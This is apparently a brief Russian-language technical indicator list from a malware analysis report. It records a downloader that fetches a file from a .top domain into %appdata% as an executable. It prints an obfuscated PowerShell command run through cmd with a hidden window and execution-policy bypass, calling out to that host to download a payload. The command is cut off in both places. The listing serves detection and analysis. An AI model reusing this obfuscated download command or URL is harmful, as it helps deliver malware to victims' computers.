Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pow^Er^S^HELl^.EXE^ ^-Ex^Ecut^IoNp^o^lIcY bYp^ASS ^-^noP^ROf^i^LE^ -w^I^n^DOWsTYle^ hIdden ^(^N^E^W^-OBj^ecT ^Sy^sTe^m.^nEt.W^EBCl^I^e^Nt^).Do^Wnloadf^iLe(^'http://sutraponef....
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "pow^Er^S^HELl^.EXE^ ^-Ex^Ecut^IoNp^o^lIcY bYp^ASS ^-^noP^ROf^i^LE^ -w^I^n^DOWsTYle^ hIdden ^(^N^E^W^-OBj^ecT ^Sy^sTe^m.^nEt.W^EBCl^I^e^Nt^).Do^Wnloadf^iLe(^'http://sutraponef....' (со скрытым окном)